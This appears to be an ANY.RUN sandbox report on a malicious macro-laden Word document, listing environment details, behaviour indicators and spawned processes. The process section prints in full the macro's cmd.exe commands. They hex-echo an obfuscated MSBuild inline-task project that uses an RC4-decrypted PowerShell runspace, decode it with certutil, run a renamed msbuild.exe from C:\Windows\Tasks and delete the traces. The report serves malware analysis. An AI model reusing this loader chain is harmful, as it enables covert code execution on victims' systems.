General Info

File name

e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc

Full analysis
https://app.any.run/tasks/24a834ff-99b3-4eee-83ed-962d174fc49b
Verdict
Malicious activity
Analysis date
6/12/2019, 03:40:09
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

f2c85339676398ff5e8d83204c5a76a3

SHA1

01ddcb30308bcf7ea75feba02eea4b04295ac844

SHA256

e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a

SSDEEP

768:/LEPTJ3vrOO3RToQgsmvSz1BSHC0zolScXOl/:GJ3zaQXrq5M/O5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • weXfvlHFdeZDapgOMUTXuEy.exe (PID: 1916)
Starts Visual C# compiler
  • weXfvlHFdeZDapgOMUTXuEy.exe (PID: 1916)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3328)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3328)
Removes files from Windows directory
  • cmd.exe (PID: 3656)
Starts CertUtil for decode files
  • cmd.exe (PID: 3656)
Creates files in the Windows directory
  • cmd.exe (PID: 3656)
Starts application from unusual location
  • cmd.exe (PID: 3656)
Executable content was dropped or overwritten
  • cmd.exe (PID: 3656)
Creates files in the user directory
  • WINWORD.EXE (PID: 3328)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3328)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x7aec387e
ZipCompressedSize:
391
ZipUncompressedSize:
1453
ZipFileName:
[Content_Types].xml
XMP
Title:
null
Subject:
null
Creator:
alizee
Description:
null
XML
Keywords:
null
LastModifiedBy:
alizee
RevisionNumber:
3
CreateDate:
2019:05:08 18:20:00Z
ModifyDate:
2019:05:08 18:29:00Z
Template:
Normal.dotm
TotalEditTime:
7 minutes
Pages:
1
Words:
null
Characters:
null
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
null
Paragraphs:
null
ScaleCrop:
No
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
null
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16

Screenshots

Processes

Total processes
43
Monitored processes
10
Malicious processes
1
Suspicious processes
2

Behavior graph

+
start drop and start winword.exe no specs cmd.exe no specs cmd.exe certutil.exe no specs wexfvlhfdezdapgomutxuey.exe no specs csc.exe no specs cvtres.exe no specs csc.exe no specs cvtres.exe no specs calc.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3328
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
1928
CMD
"C:\Windows\System32\cmd.exe" /c "cd \Users\admin\Appdata\Local\Temp\ && del LKyigCFSSVDvtJb && del UpLkHEF && echo 3c50726f6a65637420546f6f6c7356657273696f6e3d22342e302220786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f646576656c6f7065722f6d736275696c642f32303033223e0a20203c546172676574204e616d653d224d537247554b75584b6868555363455a58424a7a4b6161223e0a2020203c4d537247554b75584b6868555363455a58424a7a4b6161202f3e0a2020203c594e774670566d654e4e4250454c6452202f3e0a2020203c2f5461726765743e0a20203c5573696e675461736b0a202020205461736b4e616d653d224d537247554b75584b6868555363455a58424a7a4b6161220a202020205461736b466163746f72793d22436f64655461736b466163746f7279220a20202020417373656d626c7946696c653d22433a5c57696e646f77735c4d6963726f736f66742e4e65745c4672616d65776f726b5c76342e302e33303331395c4d6963726f736f66742e4275696c642e5461736b732e76342e302e646c6c22203e0a202020203c506172616d6574657247726f75702f3e0a202020203c5461736b3e0a2020202020203c5573696e67204e616d6573706163653d2253797374656d22202f3e0a0920203c5573696e67204e616d6573706163653d2253797374656d2e494f22202f3e0a2020202020203c436f646520547970653d22467261676d656e74 >> LKyigCFSSVDvtJb && echo 22204c616e67756167653d226373223e0a2020202020203c2f436f64653e0a202020203c2f5461736b3e0a093c2f5573696e675461736b3e0a093c5573696e675461736b0a202020205461736b4e616d653d22594e774670566d654e4e4250454c6452220a202020205461736b466163746f72793d22436f64655461736b466163746f7279220a20202020417373656d626c7946696c653d22433a5c57696e646f77735c4d6963726f736f66742e4e65745c4672616d65776f726b5c76342e302e33303331395c4d6963726f736f66742e4275696c642e5461736b732e76342e302e646c6c22203e0a093c5461736b3e0a0920203c5265666572656e636520496e636c7564653d2253797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e22202f3e0a2020202020203c436f646520547970653d22436c61737322204c616e67756167653d226373223e0a20202020202020203c215b43444154415b0a09097573696e672053797374656d3b0a09097573696e672053797374656d2e494f3b0a09097573696e672053797374656d2e546578743b0a09097573696e672053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e3b0a09097573696e672053797374656d2e436f6c6c656374696f6e732e47656e657269633b0a09097573696e672053797374656d2e436f6c6c656374696f6e732e >> LKyigCFSSVDvtJb && echo 4f626a6563744d6f64656c3b0a09097573696e67204d6963726f736f66742e4275696c642e5574696c69746965733b0a09097573696e67204d6963726f736f66742e4275696c642e4672616d65776f726b3b0a09097573696e672053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e52756e7370616365733b0a09090a09097075626c696320636c61737320594e774670566d654e4e4250454c6452203a20205461736b2c20495461736b207b090a0909097075626c6963206f7665727269646520626f6f6c20457865637574652829207b0a09090909646563696d616c2061447043515968524747416b714c517a5751414676436d203d2032393531393b0d0a09090909766172205a6b6846586962644e466955203d2033333936373b0d0a09090909666c6f6174206a596c494e52586d6d5470657a574e6c426b4649203d2037363735333b0d0a09090909666c6f6174206b7a78504e6e6e4450736b6d6a4b6c67774575203d2038333738393b0d0a090909096c6f6e67204750616a5473203d2038393030343b0d0a09090909646f75626c65204867495a6f485059577973514944706571506572203d2036303031393b0d0a090909096c6f6e67204b427061654375203d2036353635373b0d0a0a09090909627974655b5d206f4f5157666f786378654946203d207b307834332c20307830662c >> LKyigCFSSVDvtJb && echo 20307866372c20307835332c20307863652c20307835622c20307831612c20307837352c20307865372c20307833302c20307866652c20307863362c20307862302c20307863332c20307862632c20307839352c20307862662c20307830632c20307862362c20307836652c20307864632c20307839662c20307864662c20307833362c20307832652c20307836362c20307834642c20307863612c20307862362c20307839322c20307861352c20307863647d3b0a0909090952756e7370616365206451554e79484345654c426e4a647171654b44575447203d2052756e7370616365466163746f72792e43726561746552756e737061636528293b0a090909096451554e79484345654c426e4a647171654b445754472e4f70656e28293b0a0909090952756e7370616365496e766f6b6520784376505866684e4f4c7a79504d42684c66203d206e65772052756e7370616365496e766f6b65286451554e79484345654c426e4a647171654b44575447293b0a09090909696e74207848526b72203d2034373533303b0d0a09090909766172206372654c6b626a474e6c53514d786345203d2035353930303b0d0a09090909666c6f61742071565367426c7357203d2038383338303b0d0a09090909696e742055507a737455736b655744686e716950707a54203d2038313138373b0d0a09090909766172207970535a4b >> LKyigCFSSVDvtJb && echo 58714e62786976477a786554585947727343203d2034373030393b0d0a090909096c6f6e6720775653756f7a794d7073464c6a704f647777203d2034313537303b0d0a09090909646563696d616c20524678726f4765203d2033393230393b0d0a090909096c6f6e67205a536d426159203d2039323638383b0d0a09090909696e74204a43576b63446f6a6f5765536d6e54514d59203d2033303238343b0d0a090909096c6f6e67206b474f4f4a5668765750496874685148203d2038333731353b0d0a0a09090909506970656c696e65206e49585776667764556f596a516575203d206451554e79484345654c426e4a647171654b445754472e437265617465506970656c696e6528293b0a09090909737472696e67205a4e616451734e65734a7171464651476a536c657151203d20695a4a64435858466f65615365566f704c646c545754572e555169647328226a303662307d2a287b292e2c5d603c3e5b4c37383077796b334f43416f49593541444464477442364f65737547777d2a287b292e2c5d603c3e5b69614f667d2a287b292e2c5d603c3e5b305042614e4b78306c5764714d6f3d22293b0a0a09090909627974655b5d206d7552627a63457a5a6b586f617475764e203d20436f6e766572742e46726f6d426173653634537472696e67285a4e616451734e65734a7171464651476a536c657151293b0a09 >> LKyigCFSSVDvtJb && echo 090909737472696e6720425674476c46203d20456e636f64696e672e555446382e476574537472696e67286e7a526c4e4756734376586d66742e74797978786b54556f45765a286f4f5157666f7863786549462c206d7552627a63457a5a6b586f617475764e29293b0a0a090909096e49585776667764556f596a5165752e436f6d6d616e64732e41646453637269707428425674476c46293b0a090909096e49585776667764556f596a5165752e436f6d6d616e64732e41646428224f75742d537472696e6722293b0a090909096c6f6e6720534965444743527249555148665451574f4f69476762203d2035363031343b0d0a09090909646f75626c6520546b6d466c734b545941635655755a486a4b6e7174203d2039373631333b0d0a09090909646563696d616c206876457451496e525553715373496e4f5264585874577254203d2037323733353b0d0a0a09090909436f6c6c656374696f6e3c50534f626a6563743e20526f7971677264556361695664774a417257755270203d206e49585776667764556f596a5165752e496e766f6b6528293b0a090909096451554e79484345654c426e4a647171654b445754472e436c6f736528293b0a0a09090909537472696e674275696c646572205745676d54427a203d206e657720537472696e674275696c64657228293b0a09090909666f72656163682850534f >> LKyigCFSSVDvtJb && echo 626a656374206c694376454a437a6d54464d55767a20696e20526f7971677264556361695664774a41725775527029207b0a09090909095745676d54427a2e417070656e644c696e65286c694376454a437a6d54464d55767a2e546f537472696e672829293b0a090909097d0a09090909436f6e736f6c652e5772697465285745676d54427a2e546f537472696e672829293b0a0909090972657475726e20747275653b0a0909097d0a09097d0a09090a09097075626c696320636c61737320695a4a64435858466f65615365566f704c646c54575457207b0a0909097075626c69632073746174696320737472696e6720555169647328737472696e672043574d436b4e68426c6a6d55704d414e76576952496229207b0a09090909737472696e67206c737a6b78203d2022267e4024232d3f2125223b0a09090909737472696e6720766b41625741734d6f5a4f4f7968594e4f7156434c203d20227d2a287b292e2c5d603c3e5b223b0a0909090972657475726e2043574d436b4e68426c6a6d55704d414e7657695249622e5265706c616365286c737a6b782c20226d22292e5265706c61636528766b41625741734d6f5a4f4f7968594e4f7156434c2c20225622293b0a0909097d0a09097d0a0a09097075626c696320636c617373206e7a526c4e4756734376586d6674207b0a0909097075626c6963207374617469 >> LKyigCFSSVDvtJb"
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3656
CMD
"C:\Windows\System32\cmd.exe" /k "cd \Users\admin\Appdata\Local\Temp\ && echo 6320627974655b5d206f5a6a46707764744e666850674678664d496b6a7028627974655b5d20797851626c656d427a6c4a2c20627974655b5d2077757861435945755763664e696b6844566c6d4829207b0a09090909696e742068465358594a4e776649496d6e7769446a6971654e6e2c206f67535263694b436c6e5a6a6f412c2041784e4849514268524d49667074724f436144584372574f2c20586743666d5774494b45617a2c2052597a46453b0a09090909696e745b5d2046775a6e47454b6f7566694c6d6274704a2c206c576775586c724e5069464753586b47643b0a09090909627974655b5d204c47554c566c55515545726b5852736e74436f57553b0a0a0909090946775a6e47454b6f7566694c6d6274704a203d206e657720696e745b3235365d3b0a090909096c576775586c724e5069464753586b4764203d206e657720696e745b3235365d3b0a090909094c47554c566c55515545726b5852736e74436f5755203d206e657720627974655b77757861435945755763664e696b6844566c6d482e4c656e6774685d3b0a0a09090909666f7220286f67535263694b436c6e5a6a6f41203d20303b206f67535263694b436c6e5a6a6f41203c203235363b206f67535263694b436c6e5a6a6f412b2b29207b0a090909090946775a6e47454b6f7566694c6d6274704a5b6f67535263694b436c6e5a6a6f41 >> LKyigCFSSVDvtJb && echo 5d203d20797851626c656d427a6c4a5b6f67535263694b436c6e5a6a6f41202520797851626c656d427a6c4a2e4c656e6774685d3b0a09090909096c576775586c724e5069464753586b47645b6f67535263694b436c6e5a6a6f415d203d206f67535263694b436c6e5a6a6f413b0a090909097d0a09090909666f72202841784e4849514268524d49667074724f436144584372574f203d206f67535263694b436c6e5a6a6f41203d20303b206f67535263694b436c6e5a6a6f41203c203235363b206f67535263694b436c6e5a6a6f412b2b29207b0a090909090941784e4849514268524d49667074724f436144584372574f203d202841784e4849514268524d49667074724f436144584372574f202b206c576775586c724e5069464753586b47645b6f67535263694b436c6e5a6a6f415d202b2046775a6e47454b6f7566694c6d6274704a5b6f67535263694b436c6e5a6a6f415d292025203235363b0a090909090952597a4645203d206c576775586c724e5069464753586b47645b6f67535263694b436c6e5a6a6f415d3b0a09090909096c576775586c724e5069464753586b47645b6f67535263694b436c6e5a6a6f415d203d206c576775586c724e5069464753586b47645b41784e4849514268524d49667074724f436144584372574f5d3b0a09090909096c576775586c724e5069464753586b47645b4178 >> LKyigCFSSVDvtJb && echo 4e4849514268524d49667074724f436144584372574f5d203d2052597a46453b0a090909097d0a09090909666f72202868465358594a4e776649496d6e7769446a6971654e6e203d2041784e4849514268524d49667074724f436144584372574f203d206f67535263694b436c6e5a6a6f41203d20303b206f67535263694b436c6e5a6a6f41203c2077757861435945755763664e696b6844566c6d482e4c656e6774683b206f67535263694b436c6e5a6a6f412b2b29207b0a090909090968465358594a4e776649496d6e7769446a6971654e6e2b2b3b0a090909090968465358594a4e776649496d6e7769446a6971654e6e20253d203235363b0a090909090941784e4849514268524d49667074724f436144584372574f202b3d206c576775586c724e5069464753586b47645b68465358594a4e776649496d6e7769446a6971654e6e5d3b0a090909090941784e4849514268524d49667074724f436144584372574f20253d203235363b0a090909090952597a4645203d206c576775586c724e5069464753586b47645b68465358594a4e776649496d6e7769446a6971654e6e5d3b0a09090909096c576775586c724e5069464753586b47645b68465358594a4e776649496d6e7769446a6971654e6e5d203d206c576775586c724e5069464753586b47645b41784e4849514268524d49667074724f436144584372 >> LKyigCFSSVDvtJb && echo 574f5d3b0a09090909096c576775586c724e5069464753586b47645b41784e4849514268524d49667074724f436144584372574f5d203d2052597a46453b0a0909090909586743666d5774494b45617a203d206c576775586c724e5069464753586b47645b28286c576775586c724e5069464753586b47645b68465358594a4e776649496d6e7769446a6971654e6e5d202b206c576775586c724e5069464753586b47645b41784e4849514268524d49667074724f436144584372574f5d29202520323536295d3b0a09090909094c47554c566c55515545726b5852736e74436f57555b6f67535263694b436c6e5a6a6f415d203d202862797465292877757861435945755763664e696b6844566c6d485b6f67535263694b436c6e5a6a6f415d205e20586743666d5774494b45617a293b0a090909097d0a0909090972657475726e204c47554c566c55515545726b5852736e74436f57553b0a0909097d0a0a0909097075626c69632073746174696320627974655b5d2074797978786b54556f45765a28627974655b5d206664515a594a2c20627974655b5d20585846704a635363437475585958664b736169456d5529207b0a0909090972657475726e206f5a6a46707764744e666850674678664d496b6a70286664515a594a2c20585846704a635363437475585958664b736169456d55293b0a0909097d0a09097d >> LKyigCFSSVDvtJb && echo 0a20202020202020205d5d3e0a2020202020203c2f436f64653e0a202020203c2f5461736b3e0a20203c2f5573696e675461736b3e0a3c2f50726f6a6563743e0a >> LKyigCFSSVDvtJb && certutil -decodehex LKyigCFSSVDvtJb UpLkHEF && copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe && C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe UpLkHEF && del C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe && del UpLkHEF && del LKyigCFSSVDvtJb"
Path
C:\Windows\System32\cmd.exe
Indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\tasks\wexfvlhfdezdapgomutxuey.exe

PID
3264
CMD
certutil -decodehex LKyigCFSSVDvtJb UpLkHEF
Path
C:\Windows\system32\certutil.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
CertUtil.exe
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wldap32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1916
CMD
C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe UpLkHEF
Path
C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MSBuild.exe
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\tasks\wexfvlhfdezdapgomutxuey.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\52cca48930e580e3189eac47158c20be\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\55560c2014611e9119f99923c9ebdeef\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\msbuild\9f72a8d78d2fc6ba5a2ab3c929570970\msbuild.ni.exe
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\46957030830964165644b52b0696c5d9\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.b3325a29b#\3e3842d4bcde91f8b208fb72edee26fa\microsoft.build.framework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.build\06c99c802a5a23f7f88e7e8fc74947cf\microsoft.build.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\assembly\gac_msil\microsoft.build\v4.0_4.0.0.0__b03f5f7f11d50a3a\microsoft.build.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.ifcaec084#\1cb6bce8581c143f10381abf1f015a1b\microsoft.internal.tasks.dataflow.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
